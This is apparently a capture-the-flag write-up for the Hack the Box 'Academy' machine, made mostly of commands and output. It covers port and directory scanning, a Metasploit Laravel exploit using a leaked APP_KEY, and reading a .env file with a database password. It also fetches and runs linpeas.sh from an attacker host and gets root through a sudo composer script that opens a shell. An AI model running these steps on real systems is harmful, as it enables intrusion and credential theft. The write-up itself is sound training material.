Hack the Box — Academy

Reconnaissance

sudo nmap -sC -sV -O -p- -oA nmap/nmap 10.10.10.215
....
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
....
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
....

Enumeration

10.10.10.215    academy.htb
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://academy.htb
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://academy.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://academy.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/06 11:59:38 Starting gobuster
===============================================================
/images (Status: 301)
....
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://academy.htb -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://academy.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/12/06 12:03:59 Starting gobuster
===============================================================
/home.php (Status: 302)
/images (Status: 301)
/login.php (Status: 200)
/register.php (Status: 200)
/index.php (Status: 200)
/admin.php (Status: 200)
/config.php (Status: 200)
....
10.10.10.215    academy.htb dev-staging-01.academy.htb

Initial Foothold

searchsploit -m 47129.rb
msfconsole -q
set APP_KEY "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
set RHOSTS 10.10.10.215
set VHOST dev-staging-01.academy.htb
set LHOST 10.10.14.8

Privilege Escalation

python3 -c 'import pty; pty.spawn("/bin/bash")'

www-date -> cry0l1t3

www-data@academy:/var/www/html/academy$ ls -la
ls -la
total 344
drwxr-xr-x 12 www-data www-data 4096 Dec 4 23:28 .
drwxr-xr-x 4 root root 4096 Aug 13 12:36 ..
-rw-r--r-- 1 www-data www-data 706 Aug 13 12:42 .env
-rw-r--r-- 1 www-data www-data 651 Feb 7 2018 .env.example
www-data@academy:/var/www/html/academy$ cat .env
....
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
www-data@academy:/var/www/html/academy$ locate user.txt
locate user.txt
/home/cry0l1t3/user.txt

cry0l1t3 -> mrb3n

python -m SimpleHTTPServer 5555
wget http://10.10.14.8:5555/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

mrb3n -> root

sudo -l
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Lessons Learned

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store